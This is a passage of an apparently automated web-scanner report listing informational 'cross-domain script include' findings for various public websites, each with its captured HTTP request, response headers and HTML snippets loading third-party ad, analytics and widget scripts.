HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:05:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 75a2a69c945fc9bbaf3897f5bc47b14f=dp2ff9jkt3mlta9rvo5qn02g00; path=/
Last-Modified: Tue, 25 Jan 2011 05:05:19 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 52707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<he
...[SNIP]...
</script>
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=rotate&amp;publisher=&amp;headerbg=%23000099&amp;inactivebg=%23CCCCCC&amp;inactivefg=%23000000&amp;linkfg=%23000099&amp;services=reddit%2Cdigg%2Cfacebook%2Cmyspace%2Cdelicious%2Cstumbleupon%2Ctechnorati%2Cgoogle_bmarks%2Cyahoo_bmarks%2Cyahoo_myweb%2Cwindows_live%2Cpropeller%2Cfriendfeed%2Cnewsvine%2Cxanga%2Cmixx%2Cblinklist%2Cfurl%2Cmagnolia%2Cmister_wong%2Cn4g%2Cblogmarks%2Cfaves%2Ccurrent%2Csimpy%2Cslashdot%2Cmeneame%2Cyigg%2Coknotizie%2Cfresqui%2Cdiigo%2Ccare2%2Cfunp%2Ckirtsy%2Chugg%2Csphinn"></script>
...[SNIP]...
<p>
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</div>    
<script type="text/javascript" src="http://www.assoc-amazon.com/s/link-enhancer?tag=goozer-20&o=1">
</script>
...[SNIP]...

21.1084. http://www.greenmaven.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.greenmaven.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google.com/cse/brand?form=cse-search-box...=en

Request

GET / HTTP/1.1
Host: www.greenmaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:45:08 GMT
Server: Apache/1.3.41 (Unix) mod_fastcgi/2.4.2 mod_scgi/1.12 PHP/5.2.14 mod_psoft_traffic/0.2 mod_ssl/2.8.31 OpenSSL/0.9.8b mod_macro/1.1.2
X-Powered-By: PHP/5.2.14
Set-Cookie: 979fda0e3f6e7c8e8a6a222280b2695d=bfb4s1od493fairspf4tr05d04; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 16:45:09 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44572

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="
...[SNIP]...
</div>


<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box...=en"></script>
...[SNIP]...

21.1085. http://www.groupon.com/washington-dc/subscribe

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.groupon.com
Path:   /washington-dc/subscribe

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js
  • http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.6/jquery-ui.min.js
  • http://ajax.microsoft.com/ajax/jquery.validate/1.7/jquery.validate.js
  • http://assets1.grouponcdn.com/assets/subscriptions.js?B1519gUv
  • http://assets1.grouponcdn.com/javascripts/app/subscriptions/alerts.js?IrgXe2LC
  • http://assets1.grouponcdn.com/javascripts/app/subscriptions/disable_on_submit.js?mFqOEBi1
  • http://assets1.grouponcdn.com/javascripts/app/subscriptions/multi_steps.js?vGis9EFL
  • http://www.googleadservices.com/pagead/conversion.js

Request

GET /washington-dc/subscribe HTTP/1.1
Host: www.groupon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Tue, 25 Jan 2011 04:41:03 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=washington-dc; path=/; expires=Fri, 25-Feb-2011 04:41:03 GMT
Set-Cookie: area=dc-metro; path=/; expires=Fri, 25-Feb-2011 04:41:03 GMT
Set-Cookie: b=50b9def2-283d-11e0-baec-005056955ff3; path=/; expires=Mon, 25-Jan-2021 04:41:03 GMT
Set-Cookie: s=50b9ecd0-283d-11e0-baec-005056955ff3; path=/
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: opt_default=everyscape; path=/; expires=Fri, 25-Jan-2013 04:41:03 GMT
Set-Cookie: opt_everyscape_v=2; path=/; expires=Fri, 25-Jan-2013 04:41:03 GMT
Set-Cookie: visited=true; path=/; expires=Mon, 25-Jan-2021 04:41:03 GMT
Set-Cookie: _thepoint=6852e11ca9c5d4ffe0ea0a6c4fc641c7; domain=.groupon.com; path=/; expires=Wed, 26 Jan 2011 04:41:03 GMT; HttpOnly
Status: 200
ETag: "26024001126e5388595773093590f729"
X-S-COOKIE: 50b9ecd0-283d-11e0-baec-005056955ff3
X-B-COOKIE: 50b9def2-283d-11e0-baec-005056955ff3
X-Runtime: 69
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 24862
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xmlns='http://www
...[SNIP]...
</script>
<script src="http://www.googleadservices.com/pagead/conversion.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.6/jquery-ui.min.js" type="text/javascript"></script>
<script src="http://assets1.grouponcdn.com/assets/subscriptions.js?B1519gUv" type="text/javascript"></script>
<script src="http://assets1.grouponcdn.com/javascripts/app/subscriptions/multi_steps.js?vGis9EFL" type="text/javascript"></script>
<script src="http://ajax.microsoft.com/ajax/jquery.validate/1.7/jquery.validate.js" type="text/javascript"></script>
<script src="http://assets1.grouponcdn.com/javascripts/app/subscriptions/alerts.js?IrgXe2LC" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://assets1.grouponcdn.com/javascripts/app/subscriptions/disable_on_submit.js?mFqOEBi1" type="text/javascript"></script>
...[SNIP]...

21.1086. http://www.hashemian.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hashemian.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://edge.quantserve.com/quant.js
  • http://google.com/coop/cse/brand?form=searchbox_000349523585929632139%3Ampsahfy4uju
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google-analytics.com/urchin.js
  • http://xslt.alexa.com/site_stats/js/t/a?url=hashemian.com

Request

GET / HTTP/1.1
Host: www.hashemian.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:11:53 GMT
Server: Apache/2.2.15
Vary: Host
Accept-Ranges: bytes
Cache-Control: no-store
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25523

<html>
<head>
<title>Free Web Tools, Financial Markets Book, Financial Blog, Hashemian</title>
<meta name="description" content="Free Web Tools, the book Financial Markets For The Rest Of Us. Lates
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://google.com/coop/cse/brand?form=searchbox_000349523585929632139%3Ampsahfy4uju"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</span-->
<SCRIPT type='text/javascript' language='JavaScript' src='http://xslt.alexa.com/site_stats/js/t/a?url=hashemian.com'></SCRIPT>
...[SNIP]...
</table>


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
<!-- Start Quantcast tag -->
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

21.1087. http://www.heroturko.org/n/Nonude-Young-and-Beauty-Pretty-Girl-teen-NN-usenet-binaries/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.heroturko.org
Path:   /n/Nonude-Young-and-Beauty-Pretty-Girl-teen-NN-usenet-binaries/x22

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
  • http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /n/Nonude-Young-and-Beauty-Pretty-Girl-teen-NN-usenet-binaries/x22 HTTP/1.1
Host: www.heroturko.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 24 Jan 2011 16:45:19 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.3
Set-Cookie: PHPSESSID=2636237a3d9a6cc753ecc8b5ac337b9c; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: dle_user_id=deleted; expires=Sun, 24-Jan-2010 16:45:18 GMT; path=/; domain=.heroturko.org; httponly
Set-Cookie: dle_password=deleted; expires=Sun, 24-Jan-2010 16:45:18 GMT; path=/; domain=.heroturko.org; httponly
Set-Cookie: dle_hash=deleted; expires=Sun, 24-Jan-2010 16:45:18 GMT; path=/; domain=.heroturko.org; httponly
Last-Modified: Mon, 24 Jan 2011 06:45:19 +0000 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 45000

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><head>
<title>Nonude Young and Beauty Pretty Girl teen NN usenet binariesx22 H
...[SNIP]...
<meta name="hotfile" content="hotfile.com-SOUL-65187c3c8ab7cfb">

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=freshwap"></script>
...[SNIP]...

21.1088. http://www.hotelcoupons.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotelcoupons.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://js.revsci.net/gateway/gw.js?csid=G07610&bpid=S0244
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google-analytics.com/urchin.js

Request

GET / HTTP/1.1
Host: www.hotelcoupons.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21491
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDSSSQSDQC=DNBEMMLCBPOAIFFKBFHHMBOM; path=/
X-Powered-By: ASP.NET
ServerId: 1
Server: Norfolk
Date: Tue, 25 Jan 2011 00:03:27 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
</script>
           <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
<!--Revenue Science Page Tag . Dominion -->
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=G07610&bpid=S0244"></script>
...[SNIP]...

21.1089. http://www.huddletogether.com/projects/lightbox2/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.huddletogether.com
Path:   /projects/lightbox2/

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google-analytics.com/urchin.js

Request

GET /projects/lightbox2/ HTTP/1.1
Host: www.huddletogether.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:41:07 GMT
Server: Apache
Last-Modified: Wed, 10 Mar 2010 20:38:11 GMT
ETag: "a0be022-3006-4817846d0f2c0"
Accept-Ranges: bytes
Content-Length: 12294
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   
   <title>Lightbox 2<
...[SNIP]...
<!-- end #content -->

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

21.1090. http://www.huffingtonpost.com/2008/11/16/paul-mccartney-hopes-to-r_n_144138.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /2008/11/16/paul-mccartney-hopes-to-r_n_144138.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.pubmatic.com/AdServer/js/universalpixel.js
  • http://edge.quantserve.com/quant.js
  • http://pixel.quantserve.com/seg/p-6fTutip1SMLM2.js
  • http://s.huffpost.com/assets/js.php?f=huff.js%2Chp_config.js%2Chp_app.js%2Chp_plugins_default.js%2Chp_plugins_default_yui.js%2Chp_init.js%2Ccookiesmin.js%2Cjsonmin.js%2Chp_track.js%2Chp_util.js%2Ccommon.js%2Clightboxes.js%2Cprovider.js%2Cposts.js%2Cshare.js%2Cquickview.js%2Cflashobjectmin.js%2Clazyload-min.js%2Cfacebook.js%2Csnproject.js%2Csnn_module.js%2Cuser.js%2Chp_message.js%2Csocial_friends.js%2Cuser%2Frecommendations.js%2Cmodal_window.js%2Cpopup_manager.js%2Cbadges_v2.js%2Csharer.js%2Chuff_promo.js%2Cuser_levels.js%2Cpopup.js%2Chuffconnect.js%2Cconnect_overview.js%2Cbing.js%2Chptwitter_anywhere.js%2Capp-feeds.js%2Chptwitter.js%2Csitemode.js&1295890410&extra3
  • http://s.huffpost.com/assets/js.php?f=modules%2Fcomments.js-min&v3d20110114
  • http://s.huffpost.com/assets/js.php?f=yui.js%2Cjquery.js&1295890410&extra6

Request

GET /2008/11/16/paul-mccartney-hopes-to-r_n_144138.html HTTP/1.1
Host: www.huffingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Length: 318812
Content-Type: text/html; charset=utf-8
Expires: Tue, 25 Jan 2011 04:41:08 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 25 Jan 2011 04:41:08 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns
...[SNIP]...
<![endif]-->

   <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=yui.js%2Cjquery.js&amp;1295890410&amp;extra6" ></script>

    <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=huff.js%2Chp_config.js%2Chp_app.js%2Chp_plugins_default.js%2Chp_plugins_default_yui.js%2Chp_init.js%2Ccookiesmin.js%2Cjsonmin.js%2Chp_track.js%2Chp_util.js%2Ccommon.js%2Clightboxes.js%2Cprovider.js%2Cposts.js%2Cshare.js%2Cquickview.js%2Cflashobjectmin.js%2Clazyload-min.js%2Cfacebook.js%2Csnproject.js%2Csnn_module.js%2Cuser.js%2Chp_message.js%2Csocial_friends.js%2Cuser%2Frecommendations.js%2Cmodal_window.js%2Cpopup_manager.js%2Cbadges_v2.js%2Csharer.js%2Chuff_promo.js%2Cuser_levels.js%2Cpopup.js%2Chuffconnect.js%2Cconnect_overview.js%2Cbing.js%2Chptwitter_anywhere.js%2Capp-feeds.js%2Chptwitter.js%2Csitemode.js&amp;1295890410&amp;extra3"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pixel.quantserve.com/seg/p-6fTutip1SMLM2.js"></script>
<!-- End Quantcast Delivery Tag -->
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- CommentsV3 -->
<script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=modules%2Fcomments.js-min&amp;v3d20110114"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>

<script src='http://ads.pubmatic.com/AdServer/js/universalpixel.js' type='text/javascript'></script>
...[SNIP]...

21.1091. http://www.iloubnan.info/artsandculture/actualite/id/47982/theme/111/titre/Raquel-Boldorini-in-concert-at-AUB-s-Assembly-Hall/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.iloubnan.info
Path:   /artsandculture/actualite/id/47982/theme/111/titre/Raquel-Boldorini-in-concert-at-AUB-s-Assembly-Hall/x22

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://platform.twitter.com/widgets.js
  • http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /artsandculture/actualite/id/47982/theme/111/titre/Raquel-Boldorini-in-concert-at-AUB-s-Assembly-Hall/x22 HTTP/1.1
Host: www.iloubnan.info
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:45:43 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=f7486e8717b0e20364b742ecc154ea9e; path=/
Connection: close
Content-Type: text/html
Content-Length: 46875


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml"

xmlns:og="http://opengraph
...[SNIP]...
<b:if cond='data:post.isFirstPost'>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js">
</script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=chgg"></script>
...[SNIP]...

21.1092. http://www.jgerman.de/news/projekt/joomla-16-ist-fertig.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jgerman.de
Path:   /news/projekt/joomla-16-ist-fertig.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://head.jgerman.de/templates/yoo_phoenix/lib/gzip/js.php?id=5412bb890f41ff7ecd8a59eba1da341d

Request

GET /news/projekt/joomla-16-ist-fertig.html HTTP/1.1
Host: www.jgerman.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:01:25 GMT
Server: HTTPD
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 1d57acaeed6d03414d456a7cab9b5e05=ve36hni7tqkcjanm1ea6nul5kasiunjn; path=/
Last-Modified: Mon, 24 Jan 2011 16:01:27 GMT
Cache-Control: max-age=33135480, public
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 28139

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de-de" lang="de-de" dir="
...[SNIP]...
</style>
<script type="text/javascript" src="http://head.jgerman.de/templates/yoo_phoenix/lib/gzip/js.php?id=5412bb890f41ff7ecd8a59eba1da341d"></script>
...[SNIP]...

21.1093. http://www.joomla-ua.org/content/view/400/10/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.joomla-ua.org
Path:   /content/view/400/10/

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /content/view/400/10/ HTTP/1.1
Host: www.joomla-ua.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Mon, 24 Jan 2011 16:04:09 GMT
Content-Type: text/html; charset=windows-1251
Connection: close
X-Powered-By: PHP/5.2.10
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 40cf95daa28915bd744253aab220bb63=-; path=/
Last-Modified: Mon, 24 Jan 2011 16:04:09 GMT
Content-Length: 36298

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk" xml:lang="uk">
<head>

...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1094. http://www.joomla.cat/notes-mainmenu-2/1-darreres/2083-el-joomla-16-ja-es-aqui

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.joomla.cat
Path:   /notes-mainmenu-2/1-darreres/2083-el-joomla-16-ja-es-aqui

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.navegaencatala.cat/giny/giny-1-g.js

Request

GET /notes-mainmenu-2/1-darreres/2083-el-joomla-16-ja-es-aqui HTTP/1.1
Host: www.joomla.cat
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:13:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 9314da27e21679ef814c2e3616267759=aggn177rv95albeviplr0a2it1; path=/
Last-Modified: Mon, 24 Jan 2011 16:13:10 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16937


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ca-es" lang="ca-es" >
...[SNIP]...
</div>
    <script type="text/javascript" src="http://www.navegaencatala.cat/giny/giny-1-g.js"></script>
...[SNIP]...

21.1095. http://www.joomla.gr/--46/93-joomla-1-6/447-joomla-new-1-6

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.joomla.gr
Path:   /--46/93-joomla-1-6/447-joomla-new-1-6

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /--46/93-joomla-1-6/447-joomla-new-1-6 HTTP/1.1
Host: www.joomla.gr
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:15 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: c0680a25a7d50af5bbee3643e0254219=a232897d27119dcf55e1ca99d18ca2fc; path=/
Last-Modified: Mon, 24 Jan 2011 15:15:15 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 26469

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="el-gr" lang="el-gr" >
<h
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1096. http://www.joomla.it/notizie/4691-e-arrivato-joomlar-160.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.joomla.it
Path:   /notizie/4691-e-arrivato-joomlar-160.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /notizie/4691-e-arrivato-joomlar-160.html HTTP/1.1
Host: www.joomla.it
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:05:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.9
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Vary: User-Agent,Accept,Accept-Encoding
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 9ceb0f1becdca810c0080330d5ccb5f5=b5f02fcebb7f5e7d0e462177081c5aff; path=/
Last-Modified: Mon, 24 Jan 2011 16:05:42 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30832

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it-it" lang="it-it" >
   <h
...[SNIP]...
<![endif]-->    

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
</script>
               <script type="text/javascript"
               src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

               </script>
...[SNIP]...

21.1097. http://www.joomla.org/site-search.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.joomla.org
Path:   /site-search.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google.com/afsonline/show_afs_search.js

Request

GET /site-search.html HTTP/1.1
Host: www.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=11952431.1295835652.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11952431.1446326731.1295835652.1295835652.1295835652.1; __utmc=11952431; __utmb=11952431.5.10.1295835652; 205e0a4a54bf75ec79a0fa3b9dc85fc0=41c830520f611d83ab14393c6f4ccb01;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:22:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Mon, 24 Jan 2011 02:22:43 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 35161

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<he
